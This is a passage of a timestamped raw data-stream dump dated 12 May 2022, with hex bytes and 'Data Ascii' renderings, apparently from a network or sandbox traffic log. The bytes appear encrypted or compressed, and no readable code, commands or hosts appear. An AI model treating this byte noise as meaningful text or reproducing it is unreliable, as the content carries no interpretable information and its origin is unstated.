f7 30 f1 4b e4 43 cf 7e 68 bf 6e 5d 85 2d e4 67 72 cf de e4 55 b1 88 92 9d 65 18 44 b1 28 e0 64 73 e2 2e b1 8b f7 ff 0b ed 07 6d c4 be 54 99 e0 9e e0 b5 b4 60 6e 9e 6b 27 6c 27 c3
                                                Data Ascii: 7>TaaLI9='ouATAq1o('*yL>cGd>^4KyW<q60WXcJbV7%W{+~sj]88$1~$OiD+uJq0KC~hn]-grUeD(ds.mT`nk'l'
                                                2022-05-12 15:08:08 UTC69INData Raw: c0 9f d0 26 f7 24 d3 6c d4 23 4a 31 7c 8e ae 12 88 de 75 e1 1b 33 35 06 2d c4 66 24 bb 92 24 14 37 e2 f6 0c a7 ed 80 bb 47 e1 7e 24 32 fe 2a 43 ba fc 67 4c 1e 2e eb 61 7c fa 7c 94 49 46 db cd 6b a0 cb 8f da 6a 3e 1e 29 a2 ea 5d 5a cb cf 4a a3 98 7e 81 16 d8 3e 6e 5a 24 9b 7c cf 69 58 88 0d 01 8b d0 ed 74 51 ec c8 66 a7 0f 6e eb d7 2a d9 b8 f6 60 8f 42 7c a9 2b e5 8d 45 3d 1a 24 6e f5 1c 59 d0 b7 d6 fc ff b7 78 54 ee b6 2a 6b 53 c7 64 e3 39 2c 12 82 ea be 78 f4 13 9d 98 ba 03 c9 96 f3 62 4b de e4 52 83 4a cb e0 e4 de ba 62 d2 c0 41 4e 48 34 48 b8 86 a2 7a f1 9c 9d 6f 2d 22 00 aa 9a b0 25 51 20 bc 31 65 ec b1 e6 3e cc 15 cb 86 34 6a 7d d5 82 8f 9b df e1 d4 8c 8d f8 75 bd 27 01 85 d5 a2 7b 1d 31 ca 99 43 b2 e5 eb f2 3e 54 fe b1 61 de e7 f9 c3 c2 61 0b 44 a7
                                                Data Ascii: &$l#J1|u35-f$$7G~$2*CgL.a||IFkj>)]ZJ~>nZ$|iXtQfn*`B|+E=$nYxT*kSd9,xbKRJbANH4Hzo-"%Q 1e>4j}u'{1C>TaaD
                                                2022-05-12 15:08:08 UTC70INData Raw: da 79 c8 1c c5 be aa a3 b7 cd 9e 7c 67 39 fc b7 0e a5 24 95 f7 dd 4d da 82 77 f1 c2 cf a7 9f ea 60 81 ea 54 3a fa fd cd 5f 04 8e 2a a9 52 8c 60 05 20 df 02 d1 7f df 30 32 26 9b f6 9a f8 2e 4e bb 8f 0f 20 8b 24 88 5c 79 35 45 a0 83 e1 24 3b 56 1f 66 b5 70 44 ad 0a 47 a0 d8 d9 78 d9 e2 c0 69 e0 e8 c2 c7 f3 71 e4 4d 88 7f c1 09 be f4 32 b0 bd e4 93 3f d2 c0 c4 ea dd 5c 1c 1b 75 71 c3 a7 c2 7a 12 93 4c dd fc 23 d3 72 c5 1c 3c 2c 52 50 9b 05 ea 17 b4 ca 02 a0 a7 40 a0 49 f3 45 23 a9 4c 56 5f b0 07 f2 69 57 ee b0 b4 ea 53 ad b5 fd e3 76 92 18 83 16 6b af d9 f2 7f 77 a3 15 20 60 08 16 38 d5 27 c2 da 52 e5 59 e2 21 fb 70 bb 2a 7c a5 ee ce 3b 30 98 6e 90 1b 10 f1 bd 68 2c 9f 50 2e a9 d6 8d e8 86 fb 3d 2f 18 ef 51 ab 4e c0 22 ec f7 d7 78 d1 2a 43 00 ae 94 95 01 8a
                                                Data Ascii: y|g9$Mw`T:_*R` 02&.N $\y5E$;VfpDGxiqM2?\uqzL#r<,RP@IE#LV_iWSvkw `8'RY!p*|;0nh,P.=/QN"x*C
                                                2022-05-12 15:08:08 UTC72INData Raw: 95 51 48 2a 95 06 34 c2 e9 bc de f9 d7 46 ee d5 39 34 a8 41 19 d4 a3 1e 40 f1 f7 fd 19 88 be e0 16 90 fe 4a 01 60 82 fe 18 1e 11 df 4b 43 37 35 db c1 69 6e 31 f8 8b be ce fd b4 1b a5 f9 f3 cb fe c4 f9 f3 bf 2e 3c 90 17 f5 99 7e d0 4b 02 88 7b 31 fc 93 5c 9c 30 09 78 ed 4a 8d d6 d8 2f 23 59 36 80 80 06 06 f3 88 82 02 d0 d1 ff 02 2d dc 77 1b 64 7e d8 92 55 68 9b b3 8c 4a 06 86 4e fe 4b ba 34 7c 9f 4a c9 ec 4a 7a 3f 16 f0 61 c9 49 e3 11 74 93 58 d1 d4 27 3a 66 62 cd fb fa 55 bb a4 c7 8a 70 6b 72 b0 26 f7 4c e3 e0 2e b7 d4 d8 e1 47 e7 1a 56 d5 98 44 97 f8 8c e0 e9 be 0f 5e 30 6b 2d 58 79 d3 2f b7 49 aa 7c eb 0b aa 1a 5a 21 22 ae 10 37 1d 0f 33 8c 7a 32 aa c3 9c e4 df a1 5b ce b6 30 7e 3f c7 53 f9 c3 61 47 59 f5 79 ce 07 16 96 96 de e1 ca f1 3b 4e d2 fb b1 19
                                                Data Ascii: QH*4F94A@J`KC75in1.<~K{1\0xJ/#Y6-wd~UhJNK4|JJz?aItX':fbUpkr&L.GVD^0k-Xy/I|Z!"73z2[0~?SaGYy;N
                                                2022-05-12 15:08:08 UTC73INData Raw: d1 b3 85 41 57 dc f4 11 56 1c 14 f1 d2 3b 71 fb d0 f9 59 49 cb d6 65 d3 92 56 e2 3d 76 38 01 84 0d 3c 7a dc 68 61 c1 19 ff 80 ae d1 08 63 e6 a7 80 b1 27 54 fc b8 34 cd 46 fd 6f 4d 67 6d a6 14 c1 8d ca 3f 1a 28 0c e1 0f 50 f2 d9 c4 f9 d1 76 ac 55 e4 98 ff 3a 53 c1 46 5c 3c 04 49 ab 4d b8 6b f8 2a d8 b0 5b 09 a6 a6 dc 21 50 ba 20 b3 83 40 d6 a2 ca cd bc 44 8b 5d 7a 4f 42 21 5f bc 86 ab 43 55 f3 dc 64 05 91 12 a6 8d 93 e4 6c 21 b6 1f d3 e0 a0 ea 5a f4 3c f0 80 25 6c 6c 99 81 8f 9d b7 d1 02 8d 8b f8 77 bf 96 d3 a1 fd 85 53 e7 3a d9 90 56 b9 13 ca d7 16 73 23 0b 6b cd ea c0 e3 ea d7 02 9a a1 fc c0 12 f6 21 48 09 f6 3c a3 86 d7 65 82 1d 3b e6 57 ab 86 97 af 9d fb e5 c3 9b e2 cd ae 8f 1b 22 67 bb 6e e4 92 b2 b5 82 30 78 38 8f 63 39 cd cc 92 e0 ea c6 42 f2 ed 0e
                                                Data Ascii: AWV;qYIeV=v8<zhac'T4FoMgm?(PvU:SF\<IMk*[!P @D]zOB!_CUdl!Z<%llwS:Vs#k!H<e;W"gn0x8c9B
                                                2022-05-12 15:08:08 UTC74INData Raw: 12 6d 0e 1b 56 3e 5f a8 71 f7 30 9a 33 b1 1a f4 82 7c ee 91 1f db 3b 13 3e 64 b5 7b 86 a3 2f 6f 8d 46 d9 79 7c ca fc 74 e0 e2 1d c7 f5 22 b4 8b 7c 7a e6 ff bf f4 35 8b d9 e1 93 a7 fa 2d c5 6b db 33 2c 0f 66 7f 25 26 e7 52 3f 93 5d d3 e9 f5 fc 5e d5 14 6c 9b 43 a0 8d cf 67 38 b4 ca 05 aa a2 71 a4 47 ff 41 34 56 4d 7a 6c a8 08 ba 69 48 f7 ac 4a ea 64 9a b4 ea d1 78 8f 0b 30 16 7a ba b1 19 7c 5b b8 19 56 50 00 87 31 d1 5a 7e 6d 0f 7e 2b 7b 43 bc 75 bb 3f 50 57 11 cf 11 36 87 44 d6 af 07 2d 98 ca 36 8c 5e 06 1f d2 97 1c 94 d3 29 00 3b cf 42 af 44 fc 21 f7 02 0b f6 d4 22 4a 20 69 a2 c9 05 8a d4 6c 86 13 39 1d c5 41 dc 62 0c fc b8 74 1f 1f aa e7 09 d3 b0 cf b9 4d f8 6b 34 2a d1 e2 91 bb f6 49 b1 c5 3d fd 61 72 d3 bc b9 4e 40 c1 17 13 ab e3 eb cf 7b 3e 66 27 b0
                                                Data Ascii: mV>_q03|;>d{/oFy|t"|z5-k3,f%&R?]^lCg8qGA4VMzliHJdx0z|[VP1Z~m~+{Cu?PW6D-6^);BD!"J il9AbtMk4*I=arN@{>f'
                                                2022-05-12 15:08:08 UTC76INData Raw: fc b4 1d 1a f3 e2 d0 a5 06 f8 f3 b3 4b 7b ef 42 f2 88 70 e9 a7 6c b5 7c 19 a6 81 56 8b 1c 8a 46 ec 4c e4 e6 d0 07 f1 84 38 a3 c7 68 07 f3 84 88 3b f4 be 39 09 f3 d6 60 6b 5e d5 d8 96 77 b9 35 4d 75 9d 84 93 5f f6 16 6e 35 7c 98 09 e4 ff 44 05 d8 18 d5 48 8b 14 e3 1b 73 67 a8 c4 f1 05 c9 66 64 ed e9 eb 26 ae a6 c7 86 7b 5f 7e b0 28 e0 92 e1 e7 04 b0 ce d8 fd 4a d3 14 4b d7 98 45 8c b8 8f e0 b5 df 0e 5e 9c ba 2c 49 0a d0 2d b7 43 a0 7a 95 5d ab 1a 5e 09 cf af 10 31 d6 50 30 8c 95 1b 46 c2 89 e2 b0 80 44 ce bc ef 6b 2a eb 7e ce c2 6b 4b c8 db 79 df 7e dd 94 90 aa bd e3 50 3e 66 3f e9 b8 09 bb 43 6b 0a dd 47 f2 69 7f e0 cc 46 a3 49 cd 7e a9 c7 5e 03 15 ee c3 77 59 d4 28 a3 86 81 78 01 58 52 13 dd 64 da 4e 7d 1a 67 02 76 03 2e 5b bb 36 41 33 9a 3f f6 12 f5 82
                                                Data Ascii: K{Bpl|VFL8h;9`k^w5Mu_n5|DHsgfd&{_~(JKE^,I-Cz]^1P0FDk*~kKy~P>f?CkGiFI~^wY(xXRdN}gv.[6A3?
                                                2022-05-12 15:08:08 UTC77INData Raw: df 33 a2 67 67 ba 9d ec 4b 72 3c 10 41 b6 f3 0d 5a 97 ee d4 fc ff f3 9f 44 eb 98 a8 3a 53 c1 01 33 3c 04 49 af cf a9 6d e3 07 bf 5d 58 03 cf 89 c8 09 69 d4 cc b9 94 d0 e9 21 dd cf ba 5b f2 9b 49 4e 48 38 4d 2e f8 91 6a fb f5 cd 68 05 ca 12 a6 8d d4 09 6d 21 ba 31 65 e6 cf 26 50 f3 1e da 8a 4a cc 55 4f 8b b5 5b 4e 5d 2a 52 9d ef 6e c4 71 c7 84 d4 84 5f f6 3a bf a6 50 b4 3a 8b 8a 16 79 f4 6d 7a c5 fd 07 fe ca 70 09 8b ae 1d a6 2c 83 d9 9a f4 2e 03 90 bf f4 0a 50 16 28 e7 33 64 97 80 b6 86 eb 47 c3 9b e8 02 a2 98 21 32 22 68 2e d0 94 a1 a6 93 3e 69 7e 95 0c ea 83 cd 94 f3 5c d6 4c e3 eb 17 34 a8 4b c7 d4 a5 34 41 ed f7 fb 19 88 b8 28 0b b2 fe 8a 1d 60 82 ea 18 1e 21 c2 57 0f 36 20 f6 c4 69 07 2b c8 88 02 92 fd a5 68 1c fb f3 d0 87 f9 14 f0 b5 22 36 90 06 f4
                                                Data Ascii: 3ggKr<AZD:S3<Im]Xi![INH8M.jhm!1e&PJUO[N]*Rnq_:P:ymzp,.P(3dG!2"h.>i~\L4K4A(`!W6 i+h"6
                                                2022-05-12 15:08:08 UTC78INData Raw: d0 91 a1 d4 d1 c0 43 fb 5c 0d 07 09 40 f9 28 c8 69 17 82 58 e0 66 dd d2 5e a6 25 b3 9b 43 99 8a c2 61 10 49 c9 03 ac d1 10 a5 49 e4 50 32 46 48 52 a2 ab 14 f0 06 71 e8 ac 40 c3 d8 aa bd e0 5a 47 8e 0b 81 07 7c ba c7 24 84 59 b2 15 47 55 02 87 31 cc 21 64 9a 0d 74 3e 11 0a ea 74 b1 13 d6 bc 10 c5 3f 9c 8e 6c 14 c3 46 2a b0 62 27 89 7c 52 ba d2 91 79 b0 d5 38 0e 3b 53 42 af 44 f9 55 f1 09 d0 47 d1 33 4c 20 6a a2 10 04 8a d8 10 b1 03 31 33 0a 53 da 0b e2 b0 ba 7e cb 38 c1 cd 24 d9 df 8a a8 45 da 56 32 23 f3 9b 91 aa f5 76 8d d7 34 ea 7b 64 c8 35 23 76 73 35 35 85 af c9 eb d8 7a 38 71 fd a3 df 5b ed 18 de 42 af 91 56 e5 06 e8 3c 01 e3 26 9b 7a 63 62 49 9f 0f ec 98 f9 b5 09 63 ec c8 7d a3 38 46 15 d6 0c c2 57 fb 28 d4 66 6d aa 14 c1 ba 6a 2f 08 2e 6e e0 12 4d
                                                Data Ascii: C\@(iXf^%CaIIP2FHRq@ZG|$YGU1!dt>t?lF*b'|Ry8;SBDUG3L j13S~8$EV2#v4{d5#vs55z8q[BV<&zcbIc}8FW(fmj/.nM
                                                2022-05-12 15:08:08 UTC79INData Raw: 37 57 f6 97 7d 89 b2 b6 8e 62 5c ad 6d f8 63 5d 3e 7b b1 1e e8 ee 40 5d e6 0c d8 94 71 4b e3 1b 51 bc 72 d1 d2 3e e3 61 4c a4 f8 e6 5f a8 ac d1 9d 78 f9 e7 a7 f2 f9 5f f0 e8 16 e3 e6 d8 fd 1a ef 05 42 4f 89 42 e3 09 8f e0 bf 87 32 5c 9c 6b 3c 41 1b cf b7 a6 44 cf 7d 94 5d a1 0d 84 66 c0 ae 10 3b 22 40 38 9d 75 80 29 c5 9d e2 ba 91 5e a1 bb ef 70 10 f8 a8 e0 15 b1 24 79 da 79 c4 1e c2 80 81 aa d8 cc f0 3f 6c 2e 20 a2 0b bb 46 78 c4 cc 43 da ad 75 f1 c2 cd a5 50 e8 5d c6 cf 55 3a fa c6 e0 77 2a 84 02 8c 8c 8c 7b 21 61 0b 11 d7 46 84 23 21 12 4f 2b 65 07 35 4c a8 48 11 29 4c 26 94 5f fa 93 6e f7 b5 36 21 3c 7c 19 75 bf 60 5c ba 87 1d a0 46 d8 60 65 f3 c7 62 f6 75 d2 d2 9c 64 e4 8a 76 6d c2 02 af f8 bd 14 9a 38 80 b7 c1 ce ef 15 ca 4f 02 1c 6a 64 f5 39 ce 6b
                                                Data Ascii: 7W}b\mc]>{@]qKQr>aL_x_BOB2\k<AD}]f;"@8u)^p$yy?l. FxCuP]U:w*{!aF#!O+e5LH)L&_n6!<|u`\F`ebudvm8Ojd9k
                                                2022-05-12 15:08:08 UTC81INData Raw: cd d8 de b2 5f e2 dc 45 4e 48 34 4a ba bf a1 6f fb f5 b3 2d 2c 24 17 a0 9a b5 25 aa 20 bc 3d 65 f5 b7 36 42 e6 05 de 91 33 e8 e2 70 61 72 62 4f 7c c0 a9 a3 d3 64 b1 42 d4 90 a6 bd 51 e7 3a c1 b7 7e b4 3b ee 09 14 7f d4 b6 41 cd ab cd ed c2 61 01 9a a7 95 11 13 f6 43 67 0b f0 7c b7 97 d9 1f 50 1c 3b fd 40 71 94 9b 8c 89 c3 6f c2 9b e2 1f a0 9e 1a 46 1d 6a 6f ee 9e 89 ec 90 3e 6f 00 bb 0d ea c6 e4 84 f7 f9 d1 64 c0 fd 17 3e bb 4f d6 d0 8d 0f 41 ed fd d0 12 fb ad e2 0a b8 f5 99 c8 60 82 ff 30 56 22 df 51 27 19 3a c6 cb 41 7f 2e c8 8e 96 b1 fd b4 11 21 b6 f3 da 87 dc f2 db a4 20 3a e8 6a b9 9b 7a f2 88 4d 8a 7d 13 cf df 5e 9a 12 e9 6f e5 5b 38 e4 d1 3c 21 ac 40 ac 80 39 02 f3 84 a6 39 fa d1 f9 19 fb f4 0a 65 31 79 cb 93 74 ab 8e b7 8a 64 72 90 4a f8 65 46 3d
                                                Data Ascii: _ENH4Jo-,$% =e6B3parbO|dBQ:~;AaCg|P;@qoFjo>od>OA`0V"Q':A.! :jzM}^o[8<!@99e1ytdrJeF=
                                                2022-05-12 15:08:08 UTC81INData Raw: d8 ac 55 ee b6 45 39 53 cd 6f f2 3c 14 42 83 ea ad 6b f2 02 8a b0 5b 02 d2 ac da 21 35 d7 cc b3 46 4a c1 dc ad da be 4e ee b9 52 b5 49 32 5d b8 e4 58 6a fb f5 d7 46 0d 20 11 a0 a3 99 4a 6c 2b 94 16 70 e0 a6 c8 72 f3 14 c1 a8 1e 66 55 45 ad 93 9a 98 82 d1 8c 8d d6 46 b1 48 cd ac f4 ac 53 e1 18 e9 9f 50 be 54 13 d6 16 7f d5 b7 18 d8 e8 d1 e7 e8 66 6e a7 a5 93 1b 7c c8 25 65 01 e3 1f 8d 75 d8 0a 50 0e 32 c8 7f 73 95 8a af 89 b0 52 c2 9b e4 cf a5 99 1a 31 67 28 6d e4 9e ce aa 91 3e 63 47 9a 0e ea c6 df 9e cb 9b d6 4c e3 ef 1d 1c b8 49 c7 de b6 32 50 eb df df 1d 88 be f6 22 82 fe 44 16 76 b1 d5 09 1b 26 ce 53 60 77 39 c6 cb 78 69 45 05 89 be 98 d5 9f 19 09 ff db 20 8c d1 fd 9c ff 24 3a e4 2d b5 98 7a fe 98 10 89 7d 19 b1 96 74 b9 1c e5 7f fb 64 d2 f7 da 25 3f
                                                Data Ascii: UE9So<Bk[!5FJNRI2]XjF Jl+prfUEFHSPTfn|%euP2sR1g(m>cGLI2P"Dv&S`w9xiE $:-z}td%?
                                                2022-05-12 15:08:08 UTC83INData Raw: f5 e1 5f d5 14 a5 01 6d bf 88 d3 61 2d a2 e2 30 ab be 59 b2 d3 8d 7c 35 57 4b 6b 5a 80 22 f2 69 40 85 6d 4a eb 75 86 98 fb 32 6b 89 23 b1 12 7a ad d7 1a 56 68 b3 13 22 75 9a af 0c d9 24 4a 78 19 5c 0b 7f 3d e2 62 21 54 47 bd 10 c9 06 3c a6 54 1a ac 01 44 f3 65 36 8a 45 29 d7 ee 96 16 81 b8 3f 05 13 fe 55 51 4c c0 21 9e 37 d7 54 d0 4d 4d 30 6d 80 91 fb 88 81 53 86 05 20 32 63 84 dd 64 2e 6f b5 51 3d 1a e4 e5 03 ca d7 a8 95 4d f2 72 ec 23 e8 4e fe 11 fc 61 51 fe e5 05 8d 8a 1c ad 85 42 33 f3 ca 7a a8 cf e7 c8 61 4d 48 fd a3 eb 34 14 c1 de 47 6e 80 5f f3 c3 cb 31 10 87 34 91 f4 6b 5d cc 70 e6 00 8d eb eb 0a 22 d8 c8 6c b1 27 5e eb aa 20 cf 46 08 00 a3 67 11 ad 07 c4 aa 73 3c 1a 33 7f f2 0c 52 f8 d1 d5 a0 f9 d8 ac 68 ef b0 45 a0 52 c7 6e e4 3c 04 43 83 ea b8
                                                Data Ascii: _ma-0Y|5WKkZ"i@mJu2k#zVh"u$Jx\=b!TG<TDe6E)?UQL!7TMM0mS 2cd.oQ=Mr#NaQB3zaMH4Gn_14k]p"l'^ Fgs<3RhERn<C
                                                2022-05-12 15:08:08 UTC84INData Raw: 5f 70 e1 18 c8 49 e4 48 f0 2b 7a bb 81 d1 d4 2d 2e 66 64 f6 ec f5 53 83 6e c7 8c 70 77 41 b6 30 14 4d cf e8 06 4d e5 d8 fb 00 fe 07 4d d5 89 43 91 36 8e cc b9 af 0b 57 f3 9a 2c 49 00 ca 33 a4 45 a0 6b 93 42 a2 e4 5f 25 c1 a6 07 e7 38 4e 3a 9f 7a 1a 57 c4 87 1c b1 ac 55 df b8 81 77 1b ef 74 ea c6 77 58 77 db 68 c8 12 c2 68 91 8c be c2 e0 3a 54 f8 e5 ba 0c ae 4b 42 f0 ca b9 f3 54 75 e9 d7 da af 50 e3 59 57 c6 78 3f db 0c de 64 2c 8e 3b a5 96 72 70 25 32 1f 1c c6 7d d5 21 30 1e 7e f6 64 2b 39 5d bf 5d 06 22 9c 35 88 48 e9 7c 7b ea 60 19 d3 15 18 1d 66 bf 69 39 85 5c 45 a0 4c f1 24 72 e2 d8 5c c3 e8 c3 cd f8 43 ec 99 7a 7e df 12 a8 0a 32 8f 8e f5 80 a7 d2 d1 c2 74 d6 a2 0c 21 64 5e fe 10 f3 85 ed 6c 75 ef e5 dd d8 76 e3 1f b2 91 42 a2 62 d2 67 32 db 03 02 aa
                                                Data Ascii: _pIH+z-.fdSnpwA0MMMC6W,I3EkB_%8N:zWUwtwXwhh:TKBTuPYWx?d,;rp%2}!0~d+9]]"5H|{`fi9\EL$r\Cz~2t!d^luvBbg2
                                                2022-05-12 15:08:08 UTC85INData Raw: 2a a7 8b bd 59 66 3b 31 2f 74 e0 a1 f3 4b e2 0e dd a8 76 62 55 49 23 9e 87 a7 8a 81 88 8b f8 c6 a0 52 df ac 80 ac 53 e1 92 db 85 49 9c 6d e0 d7 10 db ef ab 78 c4 c2 2b ec c2 67 12 9d b6 9a 02 06 e0 34 71 20 c1 07 a0 86 cd 90 43 11 2a e5 51 7c fa b7 be 8d c9 45 da 8a e7 cd ad f1 3c 37 08 62 1b e8 94 a1 bf 80 32 78 24 bd be eb cc ca 87 f4 e8 c3 5b 35 ee 03 25 bc 5a d2 5a 12 06 86 fc f2 d5 4b 8c b8 e6 65 85 fc 44 16 48 93 ff 18 14 32 d7 46 07 58 2f c7 c1 63 bf 32 c8 88 bf ba e9 b4 1b 03 ca e0 cb 87 c0 f3 db 12 24 3a e4 2d c9 98 7a fe 98 b9 88 7d 19 b1 96 48 b2 fa e7 79 eb 5b 6f f0 da 2f 28 94 2e b4 be 3d 17 fb aa 9f 2a fe db 5d 19 e5 cf 66 74 26 6b cc 81 f0 d1 9a b3 8b 71 42 94 56 ee 74 cb 24 64 b1 bd e8 ee 40 61 f9 0e 45 65 ef 58 f4 0d e3 93 67 d1 d4 27 f7
                                                Data Ascii: *Yf;1/tKvbUI#RSImx+g4q C*Q|E<7b2x$[5%ZZKeDH2FX/c2$:-z}Hy[o/(.=*]ft&kqBVt$d@aEeXg'
                                                2022-05-12 15:08:08 UTC86INData Raw: 28 ab 39 dd 2e 67 75 1d 65 2a 6f 15 c5 76 bb 31 69 b0 38 32 17 3b 84 ba 00 76 2f 05 b2 64 3c f2 45 2f b8 d8 84 0d 96 ce 57 10 12 f4 48 87 c3 d2 26 f7 66 f9 56 d6 28 59 15 7f a9 97 21 9b c7 57 9f 02 31 3f 63 72 de 64 2e de af 74 15 3d cc c3 0b d9 d5 91 a2 22 e6 79 32 29 d1 cb 92 bb fa 0e 74 c6 3d f1 61 57 d3 99 85 50 6e db ca 7a a3 8c db db 6a 32 54 d0 a6 cc 4a 78 ea d4 34 35 91 56 e5 64 5f 38 01 8f 36 ba 6b c5 0d 5d 8f 19 f5 a2 4e e8 0a 65 83 e7 6e b1 2d 4d f4 c6 3f de 5f df 11 a3 67 67 c3 37 c6 a5 79 19 37 2b 59 e3 3c 7b f2 a8 52 fc f9 d9 dd d2 ee b0 44 2a 4d b9 7f f3 3c 0e 50 a3 fb be 77 7e 53 97 b0 5a 15 e1 b8 dc 21 50 f9 a9 a2 84 52 4d 9c de cf bd 58 cc 97 78 4f 42 1e 0e a5 8e c1 7f fa f3 d6 46 bd 27 11 a0 e4 94 48 6c 2b af 12 65 c5 b1 f9 79 e2 14 cb
                                                Data Ascii: (9.gue*ov1i82;v/d<E/WH&fV(Y!W1?crd.t="y2)t=aWPnzj2TJx45Vd_86k]Nen-M?_gg7y7+Y<{RD*M<Pw~SZ!PRMXxOBF'Hl+ey
                                                2022-05-12 15:08:08 UTC88INData Raw: 7a 0d d3 19 d3 3c a2 5a b7 63 e6 2f a9 1a 54 1a d8 be 01 25 1d 00 32 8c 7a 0c cb c5 9c e2 b1 94 4d da 94 76 70 1a e5 56 1a c3 6b 41 fd 8a 79 ce 0c db 84 81 b2 a0 47 a0 3f 66 38 d2 49 1f a8 41 7b 15 dd 47 f8 6f a0 7c eb dc af 40 f6 4b bf d4 59 2c e3 fd eb 8d 2b 8e 2c b0 83 9a 62 1d 44 32 10 dd 68 c0 31 30 09 73 20 0c 03 3f 59 b5 d4 1b 31 9a 34 8a 6c e6 a0 6c d7 73 36 ca 3d 7c 15 c4 a4 53 4f bb 86 16 a0 46 d8 d1 61 c0 ca 65 f2 c0 d2 c7 f3 56 47 9b 5e 6d ed 05 9d e0 27 ba 00 b0 93 a1 d3 d3 e0 7a f9 4a 1a 91 77 51 ec 3e 5e 6b 36 8b 4a 45 f5 f9 c5 76 49 1e b2 91 63 9b a8 c5 f7 14 bf db 20 bc 24 7b b5 49 e2 4b 27 59 5c 5e 44 38 38 fd 78 65 f2 36 62 fa 7f aa b7 f9 27 6b 9e 1f af 8e 78 ab c4 1a f3 5c b2 13 29 76 14 93 2c f5 b8 4c 6d 05 52 29 6f 29 c0 1e bf 3b 7e
                                                Data Ascii: z<Zc/T%2zMvpVkAyG?f8IA{Go|@KY,+,bD2h10s ?Y14lls6=|SOFaeVG^m'zJwQ>^k6JEvIc ${IK'Y\^D88xe6b'kx\)v,LmR)o);~
                                                2022-05-12 15:08:08 UTC89INData Raw: c8 72 1d 8b bb fc 2d 12 f6 21 74 1b 9f 2a b4 97 df 65 9a 1c 3b ea 6c 6b 84 9c d3 b3 c2 69 c5 8a f2 b3 9e 9f 0b 33 67 a2 6f e4 9e 8d a1 84 2d 70 f6 8c 1e c2 e4 90 94 f3 f3 fa f3 3d f3 05 1c 56 5d cd d4 a5 2f 2e b0 f7 fd 13 54 a9 f9 27 a5 ef 54 34 0f 86 ff 1e 71 62 de 57 09 31 2a d6 ae af 6e 2a c2 9e ad 8b e9 a7 0b 7a c2 f2 da 8b c2 eb e5 a6 37 2c fd 4f e5 83 69 ee 8b 04 a0 87 18 a0 96 4f 95 09 f3 6e 3b 5f f4 e6 cc 3e 0c b9 8f 5e 57 d4 17 d3 95 58 39 de c0 df 19 d2 52 c6 5a 72 85 27 69 a3 96 bf 9b a7 62 5a 8f 5d e5 10 42 37 7c 93 2e c0 c0 4a 70 eb c6 d7 4f ce 4e c9 1b 79 fa 42 d1 d4 2f e4 66 64 03 fc e6 55 f6 a4 c7 8c 41 70 50 b0 26 ea 4c e3 e1 2e b7 e4 d8 fd 0b e7 12 4b d5 98 d6 8b c8 8f 79 b2 be 0f 4b 9c 6b 2d 54 0a c6 2c ac 73 a5 7a 2d 5c ab 1a 8e 09 c9
                                                Data Ascii: r-!t*e;lki3go-p=V]/.T'T4qbW1*n*z7,OiOn;_>^WX9RZr'ibZ]B7|.JpONyB/fdUApP&L.KyKk-T,sz-\
                                                2022-05-12 15:08:08 UTC90INData Raw: 6b a2 24 06 8a d8 0c f9 00 31 3f 63 3a de 64 2e b9 92 0c 11 37 e2 cd 75 dd df 86 93 ef f1 78 34 50 8e 47 91 b1 93 19 59 c4 37 f3 5a 0f c6 bb 92 61 3b ce ca 7c 81 41 e8 d9 6c 4b 06 ff a3 e0 34 31 c3 de 47 ba b9 28 e0 15 de 10 7e 8a 25 9d 52 7e 61 49 88 6a 88 88 c1 e1 65 1b ee c8 66 b9 0f 20 ef d7 26 e7 39 f3 00 a5 4f ed a8 07 c2 d6 04 3e 1a 24 10 8a 0f 50 f2 d9 fd 7d fd d8 aa 7d 91 b4 45 3f 7b 45 6a f2 3a 77 34 81 ea b2 04 8a 00 97 ba 53 2b 4a 98 de 27 72 51 c8 b3 85 62 63 ce de c9 cf 39 e6 b3 70 20 30 30 5b be 81 a6 04 82 f1 dc 64 3a fe 02 b4 98 bf 72 4b 20 bc 37 0a 9a a2 e0 5b fb 05 cf ef 5e 64 55 45 fa f3 9f b0 a8 ba b9 89 fe 6e a2 4f d6 83 f8 8a 2d a3 30 ca 95 58 a5 3f 8b ac 14 79 f4 ca 17 cf ea db 82 f7 63 01 90 b4 94 00 14 db 22 5d e9 f0 16 b5 81 54
                                                Data Ascii: k$1?c:d.7ux4PGY7Za;|AlK41G(~%R~aIjef &9O>$P}}E?{Ej:w4S+J'rQbc9p 00[d:rK 7[^dUEnO-0X?yc"]T
                                                2022-05-12 15:08:08 UTC92INData Raw: 4e ed fa b1 15 80 db 57 f6 db 6f 27 78 76 fb cf c3 b5 69 31 45 a9 cd 7c ab f4 ee c5 5f ff 8e 2a a9 80 84 59 30 37 09 1b e4 44 d2 21 21 1f 4f 33 65 07 35 72 ab 5f 11 ec 87 34 99 4e f0 f1 ad c7 7d 18 c8 39 6d 1b 4e f9 75 58 ab 65 96 a1 46 df 5e 77 e4 df a9 e0 e9 c3 c7 e5 4d e1 e5 ae 7f ce 12 a9 2e 20 ac 9e e7 ab 6e d2 c0 c4 7a d9 4d 08 1b 09 a6 fa 28 c4 69 14 82 59 c8 e1 ca bd 8d d4 1e b4 88 42 82 a4 e1 65 38 b2 db 05 82 98 53 a4 43 ca 78 34 57 47 43 d5 a8 14 f6 78 41 c2 3e 4e eb 79 82 2e ee 35 7c 99 23 fc 16 7a ad d1 00 6f 5c 9a 87 2c 62 06 af a8 d9 24 4a 7b 27 0f 38 7e 3b fb 7f aa 30 50 c3 12 cf 1d 28 85 7d 15 84 92 2f b0 62 1e 4c 55 2e be c1 9e 07 80 ff ae 00 13 f2 6a 3c 4a d1 20 e7 21 ad 54 d6 24 59 39 1e b1 87 05 8c cd 75 9f 08 19 a4 08 42 da 0b 67 b0
                                                Data Ascii: NWo'xvi1E|_*Y07D!!O3e5r_4N}9mNuXeF^wM. nzM(iYBe8SCx4WGCxA>Ny.5|#zo\,b$J{'8~;0P(}/bLU.j<J !T$Y9uBg
